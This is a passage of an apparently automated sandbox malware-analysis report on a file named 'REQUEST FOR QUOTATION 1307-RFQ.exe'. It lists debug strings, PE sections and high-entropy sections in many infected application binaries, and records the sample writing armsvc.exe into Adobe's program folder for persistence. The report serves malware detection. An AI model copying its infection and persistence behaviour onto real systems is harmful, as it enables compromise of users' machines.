              Source: Binary string: wntdll.pdb source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669961258.0000000004090000.00000004.00001000.00020000.00000000.sdmp, REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669485567.00000000041F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Spectrum.pdb source: Spectrum.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000001.00000003.2007127631.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000001.00000003.1753798899.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdb source: armsvc.exe, 00000001.00000003.1753798899.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000001.00000003.2264919855.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000001.00000003.2186860033.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2194688859.0000000000680000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: tnameserv.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatExe.pdb source: Acrobat.exe.1.dr
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: armsvc.exe, 00000001.00000003.1685892753.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: rmid.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000001.00000003.1941028888.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000001.00000003.1927307641.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000001.00000003.1713030613.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000001.00000003.1739406959.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1740521550.0000000002080000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1743596231.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000001.00000003.2264919855.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000001.00000003.2077685079.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: rmid.exe.1.dr
              Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000001.00000003.1739406959.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1740521550.0000000002080000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1743596231.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000001.00000003.2099016563.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: tnameserv.exe.1.dr
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000001.00000003.2186860033.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2194688859.0000000000680000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669961258.0000000004090000.00000004.00001000.00020000.00000000.sdmp, REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669485567.00000000041F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000001.00000003.1803769593.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000001.00000003.1803769593.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.1.dr
              Source: Binary string: ALG.pdb source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1664964581.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: uudf.pdb source: WBEngine.0.etl.23.dr
              Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000001.00000003.1719283145.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: armsvc.exe, 00000001.00000003.1685892753.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vssvc.pdbUGP source: VSSVC.exe.1.dr
              Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000001.00000003.1766189016.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.2149428363.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000001.00000003.2259110145.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000001.00000003.2179775011.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000001.00000003.2231521941.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2240478755.0000000000680000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2230232591.0000000000A70000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: armsvc.exe, 00000001.00000003.1724571249.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000001.00000003.2047861389.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.1.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000001.00000003.2173687677.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000001.00000003.1843747146.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdateOnDemand.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000001.00000003.2077685079.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.1.dr
              Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000001.00000003.1927307641.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Spectrum.pdbGCTL source: Spectrum.exe.1.dr
              Source: Binary string: locator.pdb source: armsvc.exe, 00000001.00000003.1745305912.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1750025499.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000001.00000003.2047861389.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wbengine.pdb source: WBEngine.0.etl.23.dr
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000001.00000003.2231521941.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2240478755.0000000000680000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2230232591.0000000000A70000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000001.00000003.2007127631.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000001.00000003.2099016563.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000001.00000003.1918851926.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
              Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000001.00000003.2283149621.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2278981032.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000001.00000003.1766189016.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000001.00000003.1731714155.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000001.00000003.1719283145.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.2160709430.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000001.00000003.2143704164.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: ADNotificationManager.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000001.00000003.2149428363.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000001.00000003.2179775011.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ifsutil.pdb source: WBEngine.0.etl.23.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000001.00000003.2173687677.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000001.00000003.1713030613.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: udfs.pdb source: WBEngine.0.etl.23.dr
              Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000001.00000003.1843747146.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000001.00000003.2106165754.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.1.dr
              Source: Binary string: ALG.pdbGCTL source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1664964581.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000001.00000003.1695308775.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: armsvc.exe, 00000001.00000003.1745305912.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1750025499.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000001.00000003.1941028888.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: ADNotificationManager.exe.1.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
              Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000001.00000003.1789345540.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000001.00000003.2259110145.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000001.00000003.2106165754.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vssapi.pdb source: WBEngine.0.etl.23.dr
              Source: Binary string: spp.pdb source: WBEngine.0.etl.23.dr
              Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
              Source: armsvc.exe.0.drStatic PE information: section name: .didat
              Source: alg.exe.0.drStatic PE information: section name: .didat
              Source: default-browser-agent.exe.1.drStatic PE information: section name: .00cfg
              Source: default-browser-agent.exe.1.drStatic PE information: section name: .voltbl
              Source: firefox.exe.1.drStatic PE information: section name: .00cfg
              Source: firefox.exe.1.drStatic PE information: section name: .freestd
              Source: firefox.exe.1.drStatic PE information: section name: .retplne
              Source: firefox.exe.1.drStatic PE information: section name: .voltbl
              Source: GoogleCrashHandler64.exe.1.drStatic PE information: section name: _RDATA
              Source: GoogleCrashHandler64.exe.1.drStatic PE information: section name: .gxfg
              Source: GoogleCrashHandler64.exe.1.drStatic PE information: section name: .gehcont
              Source: GoogleUpdateComRegisterShell64.exe.1.drStatic PE information: section name: _RDATA
              Source: GoogleUpdateComRegisterShell64.exe.1.drStatic PE information: section name: .gxfg
              Source: GoogleUpdateComRegisterShell64.exe.1.drStatic PE information: section name: .gehcont
              Source: maintenanceservice.exe.1.drStatic PE information: section name: .00cfg
              Source: maintenanceservice.exe.1.drStatic PE information: section name: .voltbl
              Source: maintenanceservice.exe.1.drStatic PE information: section name: _RDATA
              Source: minidump-analyzer.exe.1.drStatic PE information: section name: .00cfg
              Source: minidump-analyzer.exe.1.drStatic PE information: section name: .voltbl
              Source: 117.0.5938.132_chrome_installer.exe.1.drStatic PE information: section name: .00cfg
              Source: 117.0.5938.132_chrome_installer.exe.1.drStatic PE information: section name: .retplne
              Source: pingsender.exe.1.drStatic PE information: section name: .00cfg
              Source: pingsender.exe.1.drStatic PE information: section name: .voltbl
              Source: plugin-container.exe.1.drStatic PE information: section name: .00cfg
              Source: plugin-container.exe.1.drStatic PE information: section name: .voltbl
              Source: private_browsing.exe.1.drStatic PE information: section name: .00cfg
              Source: private_browsing.exe.1.drStatic PE information: section name: .voltbl
              Source: updater.exe.1.drStatic PE information: section name: .00cfg
              Source: updater.exe.1.drStatic PE information: section name: .voltbl
              Source: updater.exe.1.drStatic PE information: section name: _RDATA
              Source: FXSSVC.exe.1.drStatic PE information: section name: .didat
              Source: elevation_service.exe.1.drStatic PE information: section name: .00cfg
              Source: elevation_service.exe.1.drStatic PE information: section name: .gxfg
              Source: elevation_service.exe.1.drStatic PE information: section name: .retplne
              Source: elevation_service.exe.1.drStatic PE information: section name: _RDATA
              Source: elevation_service.exe.1.drStatic PE information: section name: malloc_h
              Source: elevation_service.exe0.1.drStatic PE information: section name: .00cfg
              Source: elevation_service.exe0.1.drStatic PE information: section name: .gxfg
              Source: elevation_service.exe0.1.drStatic PE information: section name: .retplne
              Source: elevation_service.exe0.1.drStatic PE information: section name: _RDATA
              Source: elevation_service.exe0.1.drStatic PE information: section name: malloc_h
              Source: maintenanceservice.exe0.1.drStatic PE information: section name: .00cfg
              Source: maintenanceservice.exe0.1.drStatic PE information: section name: .voltbl
              Source: maintenanceservice.exe0.1.drStatic PE information: section name: _RDATA
              Source: msdtc.exe.1.drStatic PE information: section name: .didat
              Source: msiexec.exe.1.drStatic PE information: section name: .didat
              Source: MsSense.exe.1.drStatic PE information: section name: .didat
              Source: Spectrum.exe.1.drStatic PE information: section name: .didat
              Source: TieringEngineService.exe.1.drStatic PE information: section name: .didat
              Source: vds.exe.1.drStatic PE information: section name: .didat
              Source: VSSVC.exe.1.drStatic PE information: section name: .didat
              Source: unpack200.exe.1.drStatic PE information: section name: .00cfg
              Source: WmiApSrv.exe.1.drStatic PE information: section name: .didat
              Source: wmpnetwk.exe.1.drStatic PE information: section name: .didat
              Source: SearchIndexer.exe.1.drStatic PE information: section name: .didat
              Source: ie_to_edge_stub.exe.1.drStatic PE information: section name: .00cfg
              Source: ie_to_edge_stub.exe.1.drStatic PE information: section name: .gxfg
              Source: ie_to_edge_stub.exe.1.drStatic PE information: section name: .retplne
              Source: ie_to_edge_stub.exe.1.drStatic PE information: section name: _RDATA
              Source: cookie_exporter.exe.1.drStatic PE information: section name: .00cfg
              Source: cookie_exporter.exe.1.drStatic PE information: section name: .gxfg
              Source: cookie_exporter.exe.1.drStatic PE information: section name: .retplne
              Source: cookie_exporter.exe.1.drStatic PE information: section name: _RDATA
              Source: identity_helper.exe.1.drStatic PE information: section name: .00cfg
              Source: identity_helper.exe.1.drStatic PE information: section name: .gxfg
              Source: identity_helper.exe.1.drStatic PE information: section name: .retplne
              Source: identity_helper.exe.1.drStatic PE information: section name: _RDATA
              Source: identity_helper.exe.1.drStatic PE information: section name: malloc_h
              Source: setup.exe.1.drStatic PE information: section name: .00cfg
              Source: setup.exe.1.drStatic PE information: section name: .gxfg
              Source: setup.exe.1.drStatic PE information: section name: .retplne
              Source: setup.exe.1.drStatic PE information: section name: LZMADEC
              Source: setup.exe.1.drStatic PE information: section name: _RDATA
              Source: setup.exe.1.drStatic PE information: section name: malloc_h
              Source: msedgewebview2.exe.1.drStatic PE information: section name: .00cfg
              Source: msedgewebview2.exe.1.drStatic PE information: section name: .gxfg
              Source: msedgewebview2.exe.1.drStatic PE information: section name: .retplne
              Source: msedgewebview2.exe.1.drStatic PE information: section name: CPADinfo
              Source: msedgewebview2.exe.1.drStatic PE information: section name: LZMADEC
              Source: msedgewebview2.exe.1.drStatic PE information: section name: _RDATA
              Source: msedgewebview2.exe.1.drStatic PE information: section name: malloc_h
              Source: msedge_proxy.exe.1.drStatic PE information: section name: .00cfg
              Source: msedge_proxy.exe.1.drStatic PE information: section name: .gxfg
              Source: msedge_proxy.exe.1.drStatic PE information: section name: .retplne
              Source: msedge_proxy.exe.1.drStatic PE information: section name: _RDATA
              Source: msedge_proxy.exe.1.drStatic PE information: section name: malloc_h
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0046848F push FFFFFF8Bh; iretd 0_2_00468491
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0042E70F push edi; ret 0_2_0042E711
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0042E828 push esi; ret 0_2_0042E82A
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0042EA03 push esi; ret 0_2_0042EA05
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0042EAEC push edi; ret 0_2_0042EAEE
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AEB180 push 00AEB0CAh; ret 0_2_00AEB061
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AEB180 push 00AEB30Dh; ret 0_2_00AEB1E6
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AEB180 push 00AEB2F2h; ret 0_2_00AEB262
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AEB180 push 00AEB255h; ret 0_2_00AEB2ED
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AEB180 push 00AEB2D0h; ret 0_2_00AEB346
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AEB180 push 00AEB37Fh; ret 0_2_00AEB3B7
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AE520C push 00AE528Fh; ret 0_2_00AE522D
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B0852Eh; ret 0_2_00B07F3A
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B08514h; ret 0_2_00B07F66
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B07E66h; ret 0_2_00B08057
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B0817Ah; ret 0_2_00B0808B
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B082E5h; ret 0_2_00B080D9
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B0826Ah; ret 0_2_00B0819E
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B0849Ch; ret 0_2_00B081E4
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B0805Ch; ret 0_2_00B08255
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B08321h; ret 0_2_00B082E0
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B07FBFh; ret 0_2_00B0831F
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B07FA8h; ret 0_2_00B0834C
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B084BAh; ret 0_2_00B083E2
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B08426h; ret 0_2_00B084D8
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B08075h; ret 0_2_00B084FD
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B0808Ch; ret 0_2_00B08512
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B08B6Fh; ret 0_2_00B08596
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B08550 push 00B08E94h; ret 0_2_00B085C9
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeStatic PE information: section name: .reloc entropy: 7.920466674151345
              Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.924221174690993
              Source: default-browser-agent.exe.1.drStatic PE information: section name: .reloc entropy: 7.929499319900758
              Source: firefox.exe.1.drStatic PE information: section name: .reloc entropy: 7.926775462645878
              Source: minidump-analyzer.exe.1.drStatic PE information: section name: .reloc entropy: 7.923119535596675
              Source: 117.0.5938.132_chrome_installer.exe.1.drStatic PE information: section name: .reloc entropy: 7.922527131984518
              Source: FXSSVC.exe.1.drStatic PE information: section name: .reloc entropy: 7.930238486438366
              Source: elevation_service.exe.1.drStatic PE information: section name: .reloc entropy: 7.931944255088249
              Source: Aut2exe.exe.1.drStatic PE information: section name: .rsrc entropy: 7.7963866706821925
              Source: elevation_service.exe0.1.drStatic PE information: section name: .reloc entropy: 7.934055047477224
              Source: SensorDataService.exe.1.drStatic PE information: section name: .reloc entropy: 7.923090539105195
              Source: Spectrum.exe.1.drStatic PE information: section name: .reloc entropy: 7.9334840112577325
              Source: AgentService.exe.1.drStatic PE information: section name: .reloc entropy: 7.924859831824957
              Source: vds.exe.1.drStatic PE information: section name: .reloc entropy: 7.9290296989668185
              Source: VSSVC.exe.1.drStatic PE information: section name: .reloc entropy: 7.927430160921154
              Source: wbengine.exe.1.drStatic PE information: section name: .reloc entropy: 7.929221888085987
              Source: wmpnetwk.exe.1.drStatic PE information: section name: .reloc entropy: 7.934813992480196
              Source: SearchIndexer.exe.1.drStatic PE information: section name: .reloc entropy: 7.933930452166581
              Source: 7zFM.exe.1.drStatic PE information: section name: .reloc entropy: 7.919763146683704
              Source: identity_helper.exe.1.drStatic PE information: section name: .reloc entropy: 7.928608841771513
              Source: setup.exe.1.drStatic PE information: section name: .reloc entropy: 7.932716798674576
              Source: msedgewebview2.exe.1.drStatic PE information: section name: .reloc entropy: 7.924242960753606
              Source: msedge_proxy.exe.1.drStatic PE information: section name: .reloc entropy: 7.930182120217788

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
